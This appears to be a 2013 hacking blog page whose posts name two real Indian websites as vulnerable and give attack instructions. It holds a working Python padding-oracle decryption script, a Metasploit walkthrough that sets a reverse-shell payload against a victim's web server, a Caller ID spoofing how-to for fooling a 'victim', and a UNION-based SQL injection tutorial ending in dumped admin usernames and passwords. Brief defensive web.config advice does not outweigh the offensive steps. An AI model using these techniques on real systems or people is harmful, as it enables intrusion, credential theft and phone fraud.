Wednesday 31 July 2013

Big Bazaar is Vulnerable to the ASP.NET Padding Oracle Attack

In cryptography, a padding oracle attack is a side-channel attack that targets the padding of an encrypted message. Plaintext usually has to be padded (expanded) to a multiple of the block size before the underlying cipher can process it. If the system that decrypts a ciphertext reveals whether the resulting padding was valid, for example through a distinct error message or a measurable timing difference, an attacker who can submit chosen ciphertexts can turn that single bit of leakage into full decryption of the message, and often into forged ciphertexts, without ever learning the key. Padding oracle attacks are most commonly associated with CBC-mode decryption in block ciphers; padding schemes for asymmetric algorithms such as OAEP can also be exposed to padding oracle attacks.
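The attack the paragraph above describes, worked through end to end as an added example (this is not code from the original post, and it is not the ASP.NET implementation). A small keyed Feistel network stands in for AES so the script has no library dependency; the attack never looks inside the cipher, so any CBC-mode cipher behind a padding oracle falls the same way. The key, IV and plaintext are constructed sample values.

```python
import hashlib
import os

BLOCK = 16  # block size in bytes, as for AES


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


# Stand-in block cipher: a 4-round Feistel network keyed through SHA-256.
# It is NOT secure; it only removes the need for a crypto library here.
def _f(key, rnd, half):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:BLOCK // 2]


def block_encrypt(key, block):
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in range(4):
        left, right = right, xor(left, _f(key, rnd, right))
    return left + right


def block_decrypt(key, block):
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in reversed(range(4)):
        left, right = xor(right, _f(key, rnd, left)), left
    return left + right


# PKCS#7 padding and CBC mode.
def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data):
    if not data or len(data) % BLOCK:
        raise ValueError("bad length")
    n = data[-1]
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # the distinct failure that leaks
    return data[:-n]


def cbc_encrypt(key, iv, padded):
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, xor(prev, padded[i:i + BLOCK]))
        out += prev
    return out


def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        blk = ct[i:i + BLOCK]
        out += xor(prev, block_decrypt(key, blk))
        prev = blk
    return out


def make_oracle(key):
    """Models the vulnerable server: given IV||ciphertext it answers only
    'padding valid?' (in real life: a different error page). That one bit
    is all the attacker gets, and all the attacker needs."""
    def oracle(iv_and_ct):
        try:
            unpad(cbc_decrypt(key, iv_and_ct[:BLOCK], iv_and_ct[BLOCK:]))
            return True
        except ValueError:
            return False
    return oracle


def recover_block(oracle, prev, target):
    """Recover the plaintext of `target` given the block before it.
    D(target) is learned byte by byte by forging the preceding block so the
    decryption ends in valid padding 0x01, then 0x02 0x02, and so on."""
    inter = bytearray(BLOCK)  # will hold D_key(target)
    for pos in range(BLOCK - 1, -1, -1):
        padval = BLOCK - pos
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):  # known bytes: force them to padval
            forged[j] = inter[j] ^ padval
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + target):
                continue
            if pos == BLOCK - 1:
                # A hit on the last byte may be a longer pad (0x02 0x02) by
                # accident; perturb the byte before it and re-check.
                forged[pos - 1] ^= 0xFF
                still_ok = oracle(bytes(forged) + target)
                forged[pos - 1] ^= 0xFF
                if not still_ok:
                    continue
            inter[pos] = guess ^ padval
            break
        else:
            raise RuntimeError("oracle accepted no byte at position %d" % pos)
    return xor(bytes(inter), prev)  # P_i = D(C_i) XOR C_(i-1)


def padding_oracle_attack(oracle, iv_and_ct):
    blocks = [iv_and_ct[i:i + BLOCK] for i in range(0, len(iv_and_ct), BLOCK)]
    plain = b"".join(recover_block(oracle, blocks[i - 1], blocks[i])
                     for i in range(1, len(blocks)))
    return unpad(plain)


KEY = os.urandom(16)  # the server's secret; the attacker never sees it
IV = os.urandom(16)
SECRET = b"__VIEWSTATE=role=admin;user=x"  # constructed sample plaintext


def demo():
    ciphertext = IV + cbc_encrypt(KEY, IV, pad(SECRET))
    return padding_oracle_attack(make_oracle(KEY), ciphertext)


if __name__ == "__main__":
    print(demo())
```

The attacker only ever calls `oracle`, at most 256 queries per byte plus the occasional re-check, and ends up with the full plaintext. Collapsing every failure into one identical response, with no timing difference, is what removes the oracle; the key itself is never at risk and never needed.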


But in recent days I was testing the Big Bazaar (http://www.futurebazaar.com/) website for vulnerabilities and I found that the website is vulnerable to a padding oracle attack.

ASP.NET uses encryption to hide sensitive data and protect it from tampering by the client. However, a vulnerability in the ASP.NET encryption implementation (the padding oracle issue addressed by Microsoft security bulletin MS10-070, CVE-2010-3332) allows an attacker to decrypt and tamper with this data. At the time of disclosure it affected all supported versions of ASP.NET. The attacker needs no key: it is enough that the server responds differently to a ciphertext whose padding is invalid than to one that decrypts cleanly, and the attacker observes that difference in the error codes returned after sending back altered ciphertext.


A workaround, and the one Microsoft published before the patch, is to enable the <customErrors> feature of ASP.NET and configure the application to always return the same error page, regardless of the error encountered on the server. Mapping all errors to a single page prevents an attacker from distinguishing a padding error from any other failure. Note that this only removes the obvious error-code oracle; a timing difference can remain, which is why the advisory also suggested adding a random delay to the error page, and the real fix is to install the MS10-070 update so the server no longer reveals padding validity at all.


Items that are affected:
  • /
Vulnerability Impact:

An attacker who exploits this vulnerability can decrypt data that the target server encrypted, such as the View State, and can use the same weakness to read files from the target server, such as web.config. Having decrypted the data, the attacker can tamper with its contents and send the altered ciphertext back to the server; the error codes the server returns are the oracle that makes the attack work.


Prevention:

1) Edit your ASP.NET application's root web.config file. If the file doesn't exist, create one in the root directory of the application.
2) Create or modify the <customErrors> section of the web.config file so that every error is answered with the same custom error page, and then apply the MS10-070 update.
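The web.config change the two steps above describe, shown as an added illustration rather than configuration taken from the original post: the weak setting first, then the corrected one. The file name ~/error.aspx is an assumed name.

```xml
<!-- Weak: detailed errors reach the client, so a padding failure is
     distinguishable from any other failure. This is the oracle. -->
<configuration>
  <system.web>
    <customErrors mode="Off" />
  </system.web>
</configuration>

<!-- Corrected: every error, whatever its cause, is answered with the same
     page. redirectMode="ResponseRewrite" (ASP.NET 3.5 SP1 and later) serves
     the page in place instead of issuing a 302, so the status code does not
     leak either. ~/error.aspx is an assumed file name. -->
<configuration>
  <system.web>
    <customErrors mode="On" redirectMode="ResponseRewrite" defaultRedirect="~/error.aspx" />
  </system.web>
</configuration>
```

On ASP.NET versions without redirectMode, use `<customErrors mode="On" defaultRedirect="~/error.html" />` with a static page. Verify the change by requesting a page that does not exist and a page that throws, and checking that both return the same body and the same status code; if they differ, the oracle is still there.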

Loop Mobile is Vulnerable to a Buffer Overflow Attack

Loop Mobile is a leading mobile service provider in Mumbai and also offers connectivity solutions. The company's website provides information that may help resolve your query, and you can e-mail the company through the website by filling in a form with a few details; you will get a reply on the issue soon and it will be taken care of. The site also lets you recharge your phone online. There is a customer workshop section where their team asks about problems you have faced or suggestions for improving the service; you enter a few details and the company lets you know when and where the workshop is. With the Loop Mobile customer care number you can get safe and long-lasting use of the Loop Mobile services.




But in recent days I was testing the Loop Mobile (www.loopmobile.in) website for vulnerabilities and I found that the website is fully vulnerable to a buffer overflow attack. The reason is that the website is running an Apache 2.x version older than 2.0.51.

Affected Apache versions (the off-by-one in mod_rewrite's LDAP URL handling, CVE-2006-3747):
  • Apache 1.3.28 - 1.3.36 with mod_rewrite
  • Apache 2.2.0 - 2.2.2 with mod_rewrite
  • Apache 2.0.46 - 2.0.58 with mod_rewrite
The impact of this vulnerability is that an attacker may exploit it to trigger a denial-of-service condition (a crash of the Apache child process). Arbitrary code execution has been reported to be possible as well, depending on how the server was compiled. The flaw is only reachable when mod_rewrite is enabled and a RewriteRule lets attacker-supplied data reach the ldap:// scheme handling, so the version banner alone does not prove exploitability; check the server's rewrite configuration before drawing a conclusion.

About Buffer Overflow Attacks:

In computer security and programming, a buffer overflow or buffer overrun is an anomaly in which a program, while writing data to a buffer, overruns the buffer boundary and overwrites adjacent memory. It is a special case of a memory-safety violation. Buffer overflows can be triggered by inputs designed to execute code or to alter the way the program operates. The result may be erratic program behaviour, including memory access errors, incorrect results, a crash, or a breach of system security. They are thus the basis of many software vulnerabilities and can be maliciously exploited. In the mod_rewrite case above the overflow is a single element written past the end of a buffer, which is why the usual outcome is a crash and code execution depends on the build.

How it can be done, with an example. Note that the module used below, exim4_string_format, exploits a heap buffer overflow in the Exim mail server's string_format function, not the Apache mod_rewrite issue described above; the steps show how a buffer-overflow exploit module is run from Metasploit, and they only succeed against a host running a vulnerable Exim version.

Step 1:

Boot your BackTrack 5 machine and open a terminal.



Step 2:

Type msfconsole in it.

msfconsole is the Metasploit console. Metasploit is not a tool that hacks PCs on its own; it runs an exploit module you choose against a target that actually has the corresponding vulnerability. The Metasploit Project is an open-source computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its best-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, the shellcode archive, and security research.




Step 3:

Now type 

msf >use exploit/unix/smtp/exim4_string_format




Step 4:

Type 
msf exploit(exim4_string_format) >show payloads

Step 5:

Type 
msf exploit(exim4_string_format) >set PAYLOAD generic/shell_reverse_tcp

Step 6:

 Type
msf exploit(exim4_string_format) >set LHOST [MY IP ADDRESS]

Step 7:

Type
msf exploit(exim4_string_format) >set RHOST [TARGET IP]

Note: Here you need the IP address of the victim (the web server); you can use the ping command against the host name to find it.

Step 8:
This is the last step; it launches the exploit.
Type

msf exploit(exim4_string_format) >exploit



Author Bio:
Ashwin Kak, co-founder of this blog and the author of this post, is an SEO executive by profession. He's a simple person with all possible emotions present at different degrees. In his spare time, he enjoys trekking and blogging.


Tuesday 30 July 2013

What is Caller ID Spoofing and How It Is Done

Note: Caller ID spoofing is illegal in many jurisdictions, especially when used to deceive or defraud. This post is only for educational purposes; the author of this website will not be responsible for any misuse.


Caller ID spoofing is the practice of causing the telephone network to display, on the recipient's Caller ID, a number that is not that of the actual originating station. The term is commonly used to describe situations in which the motivation is considered malicious by the speaker or writer. Just as e-mail spoofing can make a message appear to come from any e-mail address the sender chooses, Caller ID spoofing can make a call appear to come from any phone number the caller wishes. Because of the high trust people tend to place in the Caller ID system, spoofing can call the system's value into question, as Wikipedia puts it.

How it is done:

Step 1:
There are many websites that offer caller ID spoofing; you can also search for them on Google.
My preferred one is http://www.crazycall.net/ because it works 100%. Now open the website, which looks like this:



Step 2:
Now select the country, the caller ID you want to display on the victim's phone, and finally the victim's mobile number.



Step 3:
Now click on "Get me a code" and a code will be generated on the right side of the website.



Step 4:
Now your crazy call is ready! Just dial the given number and enter the code when asked on your phone.


Note: The service may charge for calls.

Manual Pentest of SQL Injection on MySQL


MySQL is the world's most popular open source database software, with over 100 million copies downloaded or distributed throughout its history. With its speed, reliability, and ease of use, MySQL has become the preferred choice for Web, Web 2.0, SaaS, ISV and telecom companies and forward-thinking corporate IT managers, because it eliminates the major problems associated with downtime, maintenance and administration of modern online applications.

Many of the world's largest and fastest-growing organizations use MySQL to save time and money powering their high-volume websites, critical business systems, and packaged software, including industry leaders such as Yahoo!, Alcatel-Lucent, Google, Nokia, YouTube, Wikipedia, and Booking.com.
The flagship MySQL offering is MySQL Enterprise, a comprehensive set of production-tested software, proactive monitoring tools, and premium support services available in an affordable annual subscription.
MySQL is a key part of LAMP (Linux, Apache, MySQL, PHP / Perl / Python), the fast-growing open source enterprise software stack. More and more companies are using LAMP as an alternative to expensive proprietary software stacks because of its lower cost and freedom from platform lock-in.
MySQL was originally founded and developed in Sweden by two Swedes and a Finn, David Axmark, Allan Larsson and Michael "Monty" Widenius, who had worked together since the 1980s. More historical information on MySQL is available on Wikipedia.

Note: This post is only for educational purposes; the author of this website will not be responsible for any kind of misuse.

Step 1:
How to check for the vulnerability:
Suppose we have a site like this: http://www.target.com/images.php?id=1. To test whether it is vulnerable we add a ' (single quote) to the end of the URL, giving http://www.target.com/images.php?id=1'. If we get an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1", the quote broke the query.
That tells us two things: the id parameter is placed into the SQL statement without escaping, and the backend is MySQL (the message is MySQL's own).

Step 2:
How to find the number of columns:
To find the number of columns we use ORDER BY (which tells the database how to sort the result) and increment the number until we get an error:
http://www.target.com/images.php?id=1 order by 1/* <-- no error
http://www.target.com/images.php?id=1 order by 2/* <-- no error
http://www.target.com/images.php?id=1 order by 3/* <-- no error
http://www.target.com/images.php?id=1 order by 4/* <-- error (a message like Unknown column '4' in 'order clause', or similar)
So the query selects only 3 columns, because ordering by the 4th produced an error.

Step 3:
How to check for UNION:
With UNION we can append the rows of a second SELECT to the result of the first, as long as both have the same number of columns (we found 3 in Step 2):
http://www.target.com/images.php?id=1 union all select 1,2,3/*
NOTE: if /* does not work or you get an error, try -- instead; it is a comment that discards the rest of the original query and is important for our query to work properly. In a URL, -- needs a trailing space to be a valid MySQL comment, so write it as --+ (or -- -); # (URL-encoded as %23) also works.
If some of the numbers 1, 2 or 3 appear on the screen, UNION works, and those positions are the ones where our data will be displayed.


Step 4:
How to check the MySQL version:
Suppose the number 2 appears on the screen. To check the version we replace that 2 with @@version or version():
http://www.target.com/images.php?id=1 union all select 1,@@version,3/*
and get something like 4.1.33-log or 5.0.45. The version should be 5.0 or later, because that is when information_schema was introduced; on older versions you have to guess the table names.

Step 5:
How to get table and column names:
http://www.target.com/images.php?id=1 union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()/*
We get the table names of the current database; look for a table such as admin that holds the login users. Now to get the column names, replace "table" with "column":
http://www.target.com/images.php?id=1 union all select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x61646d696e/*
Note: the table name should be given as a hex value (0x61646d696e is 'admin'), which avoids quotes in case they are filtered; this works most of the time. The columns are displayed on the screen: id, username, password, etc. Now to retrieve the values use:
http://www.target.com/images.php?id=1 union all select 1,concat(username,0x3a,password),3 from admin/*
(0x3a is a colon, used as the separator.)

It will show the usernames and passwords on the screen.

Posted by: Anshuman Kak